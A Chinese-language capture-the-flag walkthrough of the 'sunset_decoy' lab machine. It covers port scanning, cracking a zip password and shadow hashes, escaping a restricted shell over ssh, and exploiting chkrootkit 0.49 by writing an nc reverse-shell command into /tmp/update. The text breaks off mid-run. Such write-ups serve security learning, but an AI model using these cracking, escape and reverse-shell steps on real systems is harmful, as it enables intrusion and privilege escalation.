sunset_decoy 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.131 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 08:10 EDT
Nmap scan report for 192.168.56.131
Host is up (0.00062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:0E:3C:2A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds

开放了 22 和 80 端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.56.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-19 08:16 EDT
Nmap scan report for 192.168.56.131
Host is up (0.00052s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
|   256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_  256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open  http    Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.0K  2020-07-07 16:36  save.zip
|_
|_http-title: Index of /
MAC Address: 08:00:27:0E:3C:2A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds

Debian 操作系统，80 端口下有个压缩文件，下载到本地查看

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ file save.zip                            
save.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ unzip -l save.zip 
Archive:  save.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1807  2020-06-27 18:05   etc/passwd
     1111  2020-07-07 16:26   etc/shadow
      829  2020-06-27 17:40   etc/group
      669  2020-02-02 02:41   etc/sudoers
      185  2020-06-27 16:58   etc/hosts
       33  2020-06-27 17:39   etc/hostname
---------                     -------
     4634                     6 files

zip 压缩密码爆破

看起来是泄露了一些敏感文件，尝试解压，但是需要密码，那接下来就考虑如何爆破出解压密码

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ unzip save.zip   
Archive:  save.zip
[save.zip] etc/passwd password:

使用 zip2john 后续我们使用 john 进行爆破

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ zip2john save.zip > ziphash
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE ts=90AB cs=90ab type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: TS_chk, cmplen=434, decmplen=1111, crc=E11EC139 ts=834F cs=834f type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: TS_chk, cmplen=460, decmplen=829, crc=A1F81C08 ts=8D07 cs=8d07 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: TS_chk, cmplen=368, decmplen=669, crc=FF05389F ts=1535 cs=1535 type=8
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: TS_chk, cmplen=140, decmplen=185, crc=DFB905CD ts=8759 cs=8759 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** save.zip/etc/hostname PKZIP Encr: TS_chk, cmplen=45, decmplen=33, crc=D9C379A9 ts=8CE8 cs=8ce8 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ ls
save.zip  ziphash
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ cat ziphash                
save.zip:$pkzip$6*1*1*0*8*24*8759*a7409df1d7a76ad3809794d387209855bb7638aa589d5be62b9bf373d78055e1dd351925*1*0*8*24*1535*459926ee53809fa53fe26c3e4548cd7819791a638c8d96d3ec7cf18477ffa1e9e2e77944*1*0*8*24*834f*7d2cbe98180e5e9b8c31c5aec89c507011d26766981d17d249e5886e51ac03270b009d62*1*0*8*24*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip$::save.zip:etc/hostname, etc/hosts, etc/sudoers, etc/shadow, etc/group, etc/passwd:save.zip

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ziphash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel           (save.zip)     
1g 0:00:00:00 DONE (2023-07-19 08:36) 100.0g/s 819200p/s 819200c/s 819200C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

得到了解压密码 manuel，解压文件后查看各个文件

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ unzip save.zip
Archive:  save.zip
[save.zip] etc/passwd password: 
  inflating: etc/passwd              
  inflating: etc/shadow              
  inflating: etc/group               
  inflating: etc/sudoers             
  inflating: etc/hosts               
 extracting: etc/hostname

优先查看 shadow 文件

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ cd etc                     
┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ cat shadow    
root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::
daemon:*:18440:0:99999:7:::
bin:*:18440:0:99999:7:::
sys:*:18440:0:99999:7:::
sync:*:18440:0:99999:7:::
games:*:18440:0:99999:7:::
man:*:18440:0:99999:7:::
lp:*:18440:0:99999:7:::
mail:*:18440:0:99999:7:::
news:*:18440:0:99999:7:::
uucp:*:18440:0:99999:7:::
proxy:*:18440:0:99999:7:::
www-data:*:18440:0:99999:7:::
backup:*:18440:0:99999:7:::
list:*:18440:0:99999:7:::
irc:*:18440:0:99999:7:::
gnats:*:18440:0:99999:7:::
nobody:*:18440:0:99999:7:::
_apt:*:18440:0:99999:7:::
systemd-timesync:*:18440:0:99999:7:::
systemd-network:*:18440:0:99999:7:::
systemd-resolve:*:18440:0:99999:7:::
messagebus:*:18440:0:99999:7:::
avahi-autoipd:*:18440:0:99999:7:::
sshd:*:18440:0:99999:7:::
avahi:*:18440:0:99999:7:::
saned:*:18440:0:99999:7:::
colord:*:18440:0:99999:7:::
hplip:*:18440:0:99999:7:::
systemd-coredump:!!:18440::::::
296640a3b825115a47b68fc44501c828:$6$x4sSRFte6R6BymAn$zrIOVUCwzMlq54EjDjFJ2kfmuN7x2BjKPdir2Fuc9XRRJEk9FNdPliX4Nr92aWzAtykKih5PX39OKCvJZV0us.:18450:0:99999:7:::

拿到了两个哈希，root 的哈希大概率不能直接碰撞，不然这台靶机的难度就太低了，不过我们依然可以在后面进行试错

shadow 文件爆破

这里优先爆破 296640a3b825115a47b68fc44501c828 用户

┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ echo 'root:$6$RucK3DjUUM8TjzYJ$x2etp95bJSiZy6WoJmTd7UomydMfNjo97Heu8nAob9Tji4xzWSzeE0Z2NekZhsyCaA7y/wbzI.2A2xIL/uXV9.:18450:0:99999:7:::' > roothash
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ mv roothash ../


┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt passwdhash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
server           (296640a3b825115a47b68fc44501c828)     
1g 0:00:00:05 DONE (2023-07-19 08:40) 0.1712g/s 2936p/s 2936c/s 2936C/s felton..Hunter
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

爆破得到了密码 server 。接下来就是 ssh 登录考虑收集内部信息和提权了

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.56.131 
296640a3b825115a47b68fc44501c828@192.168.56.131 s password: 
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 19 08:45:11 2023 from 192.168.56.106
-rbash: dircolors: command not found

又进入了 rbash 中

rbash 绕过

接下来尝试绕过

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls
honeypot.decoy  honeypot.decoy.cpp  id  ifconfig  ls  mkdir  ncal  SV-502  user.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ whoami
-rbash: whoami: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ifconfig
-rbash: ifconfig: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export $PATH
-rbash: export: `PATH:/home/296640a3b825115a47b68fc44501c828/': not a valid identifier

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export $SHELL
-rbash: export: `/bin/rbash': not a valid identifier

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd
-rbash: cd: restricted
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ /bin/sh
-rbash: /bin/sh: restricted: cannot specify `/' in command names

可以使用的命令很少，/ 和 cd 命令也被禁止了，也没有明显的可以利用的别的命令和方法，那就在 ssh 登录的时候进行指定

┌──(kali㉿kali)-[~/Downloads/sunset_decoy]
└─$ ssh 296640a3b825115a47b68fc44501c828@192.168.56.131 -t "bash --noprofile"
296640a3b825115a47b68fc44501c828@192.168.56.131\'s password: 
bash: dircolors: command not found
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ whoami
bash: whoami: command not found

这里已经变成了 bash 找不到命令，我们写入新的环境变量

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ export PATH=/bin/:/usr/bin:$PATH
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ whoami
296640a3b825115a47b68fc44501c828

成功得到一个良好的 shell

提权

先查看基础信息

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:0e:3c:2a brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.131/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 384sec preferred_lft 384sec
    inet6 fe80::a00:27ff:fe0e:3c2a/64 scope link 
       valid_lft forever preferred_lft forever

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ uname -a
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat /etc/issue
Debian GNU/Linux 10 \n \l

sudo -l 查看是否有特殊权限

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ sudo -l
sudo: unable to resolve host 60832e9f188106ec5bcc4eb7709ce592: Temporary failure in name resolution

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for 296640a3b825115a47b68fc44501c828: 
Sorry, user 296640a3b825115a47b68fc44501c828 may not run sudo on 60832e9f188106ec5bcc4eb7709ce592.

查看家目录的文件

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih
total 68K
278645 drwxr-xr-x 5 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 20 04:56 .
262151 drwxr-xr-x 3 root                             root                             4.0K Jun 27  2020 ..
262357 lrwxrwxrwx 1 root                             root                                9 Jul  7  2020 .bash_history -> /dev/null                                                                                                      
262368 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  220 Jun 27  2020 .bash_logout
266583 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 3.5K Jun 27  2020 .bashrc
278647 drwx------ 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 20 03:17 .config
274005 -rwxr-xr-x 1 root                             root                              18K Jul  7  2020 honeypot.decoy                                                                                                                  
273951 -rw------- 1 root                             root                             1.9K Jul  7  2020 honeypot.decoy.cpp
273999 lrwxrwxrwx 1 root                             root                                7 Jun 27  2020 id -> /bin/id
274000 lrwxrwxrwx 1 root                             root                               13 Jun 27  2020 ifconfig -> /bin/ifconfig
278683 drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27  2020 .local
273998 lrwxrwxrwx 1 root                             root                                7 Jun 27  2020 ls -> /bin/ls
273996 lrwxrwxrwx 1 root                             root                               10 Jun 27  2020 mkdir -> /bin/mkdir
268864 -rwxr-xr-x 1 root                             root                              807 Jun 27  2020 .profile
273950 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828   66 Jun 27  2020 .selected_editor
278652 drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27  2020 SV-502
266645 -rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828   33 Jul  7  2020 user.txt
273944 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828  173 Jun 27  2020 .wget-hsts

看到一个特殊的可执行文件，其源码也在该目录下，不过没有读取的权限，使用 strings 命令查看。以下是截取出的有意思的字符

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:
No available option was selected. Ending program.
/usr/bin/date
/usr/bin/cal
Shutdown is currently not available due to not enough privileges. Ending program.
Rebooting is currently not available due to not enough privileges. Ending program.
/usr/bin/touch /dev/shm/STTY5246
The AV Scan will be launched incd a minute or less.
/usr/bin/cat /etc/passwd
/usr/bin/vi /tmp/cmFuZG9tc2Zvc2FuZm9kYW52cw==
/usr/sbin/service apache2 status

看起来是不同的数字指令会调用不同的程序，对其中提到的命令进行查看

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/date
132694 -rwxr-xr-x 1 root root 107K Feb 28  2019 /usr/bin/date
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/cal
136534 lrwxrwxrwx 1 root root 4 May  4  2018 /usr/bin/cal -> ncal
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/touch /dev/shm/STTY5246
 47043 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828   0 Jul 20 04:25 /dev/shm/STTY5246
132714 -rwxr-xr-x 1 root                             root                             95K Feb 28  2019 /usr/bin/touch                                                                                                                   
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/cat /etc/passwd
158998 -rw-r--r-- 1 root root 1.8K Jun 27  2020 /etc/passwd
132688 -rwxr-xr-x 1 root root  43K Feb 28  2019 /usr/bin/cat
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -alih /usr/bin/vi /tmp/cmFuZG9tc2Zvc2FuZm9kYW52cw==
ls: cannot access '/tmp/cmFuZG9tc2Zvc2FuZm9kYW52cw==': No such file or directory
138880 lrwxrwxrwx 1 root root 20 Jun 27  2020  /usr/bin/vi -> /etc/alternatives/vi
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ls -liah /usr/sbin/service
133198 -rwxr-xr-x 1 root root 9.1K Dec  3  2018 /usr/sbin/service

一开始最让我关注的是 /usr/bin/cal 这个符号链接指向的并不是一个绝对路径，尝试了在想办法冒名顶替，但是还是失败了，并没有冒名顶替成功

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/$ which ncal
/home/296640a3b825115a47b68fc44501c828//ncal

符号链接 777 权限也让我比较在意，但是搜索之后才知道，原来符号链接默认就是 777，而且它的操作权限实际上取决于链接到的那个文件权限。

还有个神秘的 AVScan 以及一个文件夹，进入文件夹后发现是个日志文件

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cd SV-502/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ ls -alih                                
total 12K                                                                                                           
278652 drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27  2020 .
278645 drwxr-xr-x 5 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 20 04:56 ..
273943 -rw-r--r-- 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828    0 Jun 27  2020 fich
266656 drwxrwxrwx 2 root                             root                             4.0K Jun 27  2020 logs
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502$ cd logs/
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ ls -alih
total 16K
266656 drwxrwxrwx 2 root                             root                             4.0K Jun 27  2020 .
278652 drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jun 27  2020 ..
274020 -rw-r--r-- 1 root                             root                             7.7K Jun 27  2020 log.txt
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~/SV-502/logs$ cat log.txt 
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/06/27 18:56:57 CMD: UID=0    PID=9      | 
2020/06/27 18:56:57 CMD: UID=0    PID=8      | 
2020/06/27 18:56:57 CMD: UID=1000 PID=7659   | /bin/bash 
2020/06/27 18:56:57 CMD: UID=1000 PID=7658   | python -c import pty;pty.spawn('/bin/bash') 
2020/06/27 18:56:57 CMD: UID=1000 PID=7657   | /bin/sh -i 
2020/06/27 18:56:57 CMD: UID=1000 PID=7653   | sh -c uname -a; w; id; /bin/sh -i 
2020/06/27 18:56:57 CMD: UID=1000 PID=7652   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=1000 PID=7645   | php -S 0.0.0.0:8080 
2020/06/27 18:56:57 CMD: UID=0    PID=6      | 
2020/06/27 18:56:57 CMD: UID=0    PID=59     | 
2020/06/27 18:56:57 CMD: UID=0    PID=50     | 
2020/06/27 18:56:57 CMD: UID=0    PID=49     | 
2020/06/27 18:56:57 CMD: UID=0    PID=481    | -bash 
2020/06/27 18:56:57 CMD: UID=0    PID=48     | 
2020/06/27 18:56:57 CMD: UID=0    PID=471    | (sd-pam) 
2020/06/27 18:56:57 CMD: UID=0    PID=470    | /lib/systemd/systemd --user 
2020/06/27 18:56:57 CMD: UID=0    PID=467    | sshd: root@pts/0     
2020/06/27 18:56:57 CMD: UID=0    PID=424    | /usr/sbin/sshd -D 
2020/06/27 18:56:57 CMD: UID=0    PID=423    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2020/06/27 18:56:57 CMD: UID=0    PID=422    | /usr/sbin/cups-browsed 
2020/06/27 18:56:57 CMD: UID=107  PID=420    | avahi-daemon: chroot helper 
2020/06/27 18:56:57 CMD: UID=0    PID=402    | /usr/sbin/cupsd -l 
2020/06/27 18:56:57 CMD: UID=0    PID=401    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant 
2020/06/27 18:56:57 CMD: UID=104  PID=400    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                                 
2020/06/27 18:56:57 CMD: UID=0    PID=4      | 
2020/06/27 18:56:57 CMD: UID=0    PID=399    | /usr/sbin/cron -f 
2020/06/27 18:56:57 CMD: UID=0    PID=398    | /lib/systemd/systemd-logind 
2020/06/27 18:56:57 CMD: UID=107  PID=396    | avahi-daemon: running [60832e9f188106ec5bcc4eb7709ce592.local] 
2020/06/27 18:56:57 CMD: UID=0    PID=395    | /usr/sbin/rsyslogd -n -iNONE 
2020/06/27 18:56:57 CMD: UID=0    PID=390    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                        
2020/06/27 18:56:57 CMD: UID=0    PID=30     | 
2020/06/27 18:56:57 CMD: UID=0    PID=3      | 
2020/06/27 18:56:57 CMD: UID=0    PID=294    | 
2020/06/27 18:56:57 CMD: UID=0    PID=292    | 
2020/06/27 18:56:57 CMD: UID=0    PID=29     | 
2020/06/27 18:56:57 CMD: UID=0    PID=28     | 
2020/06/27 18:56:57 CMD: UID=0    PID=27     | 
2020/06/27 18:56:57 CMD: UID=0    PID=26     | 
2020/06/27 18:56:57 CMD: UID=101  PID=255    | /lib/systemd/systemd-timesyncd 
2020/06/27 18:56:57 CMD: UID=0    PID=25     | 
2020/06/27 18:56:57 CMD: UID=0    PID=245    | /lib/systemd/systemd-udevd 
2020/06/27 18:56:57 CMD: UID=0    PID=24     | 
2020/06/27 18:56:57 CMD: UID=0    PID=23     | 
2020/06/27 18:56:57 CMD: UID=0    PID=222    | /lib/systemd/systemd-journald 
2020/06/27 18:56:57 CMD: UID=0    PID=22     | 
2020/06/27 18:56:57 CMD: UID=0    PID=21     | 
2020/06/27 18:56:57 CMD: UID=0    PID=20     | 
2020/06/27 18:56:57 CMD: UID=0    PID=2      | 
2020/06/27 18:56:57 CMD: UID=0    PID=190    | 
2020/06/27 18:56:57 CMD: UID=0    PID=19     | 
2020/06/27 18:56:57 CMD: UID=0    PID=189    | 
2020/06/27 18:56:57 CMD: UID=0    PID=187    | 
2020/06/27 18:56:57 CMD: UID=0    PID=18     | 
2020/06/27 18:56:57 CMD: UID=0    PID=17     | 
2020/06/27 18:56:57 CMD: UID=0    PID=16     | 
2020/06/27 18:56:57 CMD: UID=0    PID=153    | 
2020/06/27 18:56:57 CMD: UID=0    PID=15     | 
2020/06/27 18:56:57 CMD: UID=0    PID=14     | 
2020/06/27 18:56:57 CMD: UID=0    PID=12378  | ./pspy 
2020/06/27 18:56:57 CMD: UID=0    PID=12356  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12299  | -bash 
2020/06/27 18:56:57 CMD: UID=0    PID=12293  | sshd: root@pts/2     
2020/06/27 18:56:57 CMD: UID=0    PID=12275  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12248  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12247  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12178  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12121  | 
2020/06/27 18:56:57 CMD: UID=0    PID=12     | 
2020/06/27 18:56:57 CMD: UID=0    PID=112    | 
2020/06/27 18:56:57 CMD: UID=0    PID=110    | 
2020/06/27 18:56:57 CMD: UID=0    PID=11     | 
2020/06/27 18:56:57 CMD: UID=0    PID=108    | 
2020/06/27 18:56:57 CMD: UID=0    PID=107    | 
2020/06/27 18:56:57 CMD: UID=0    PID=105    | 
2020/06/27 18:56:57 CMD: UID=0    PID=104    | 
2020/06/27 18:56:57 CMD: UID=0    PID=102    | 
2020/06/27 18:56:57 CMD: UID=0    PID=10     | 
2020/06/27 18:56:57 CMD: UID=0    PID=1      | /sbin/init 
2020/06/27 18:56:58 CMD: UID=0    PID=12385  | -bash 
2020/06/27 18:56:58 CMD: UID=0    PID=12386  | tar -xvzf chkrootkit-0.49.tar.gz 
2020/06/27 18:57:04 CMD: UID=0    PID=12389  | -bash 
2020/06/27 18:57:04 CMD: UID=0    PID=12390  | -bash 
2020/06/27 18:57:04 CMD: UID=0    PID=12391  | -bash 
2020/06/27 18:57:05 CMD: UID=0    PID=12392  | -bash 
2020/06/27 18:57:05 CMD: UID=0    PID=12393  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12394  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12395  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12396  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12397  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12398  | -bash 
2020/06/27 18:57:06 CMD: UID=0    PID=12399  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12400  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12401  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12402  | -bash 
2020/06/27 18:57:07 CMD: UID=0    PID=12403  | -bash 
Exiting program... (interrupt)

在这里最开始信息收集没做好，这个文件内容中应该可以提取到两个关键信息：

• chkrootkit-0.49.tar.gz 包含了版本号的软件压缩包
• 日志文件是通过 pspy 工具产生的

chkrootkit 提权漏洞

一开始我只想到了去找 chkrootkit 软件所在的位置，但是没搜到，大概率在 root 目录下，之后就放弃了，没有考虑到版本号，这里应当去搜索一下这个版本是否存在漏洞信息

┌──(kali㉿kali)-[~/Downloads/sunset_decoy/etc]
└─$ searchsploit chkrootkit
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit)                              | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation                                      | linux/local/33899.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

要求 chkrootkit 是以 root 权限运行的，而 honeypot.decoy 是普通用户调用的，但是其中也提到一个点，反病毒软件是一分钟内运行的，所以也可能是 root 权限运行的。

按照上述步骤试一试

296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ echo "/usr/bin/nc -e /bin/sh 192.168.56.106 4444" > /tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ cat update 
/usr/bin/nc -e /bin/sh 192.168.56.106 4444
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:/tmp$ ~/honeypot.decoy 
--------------------------------------------------

Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
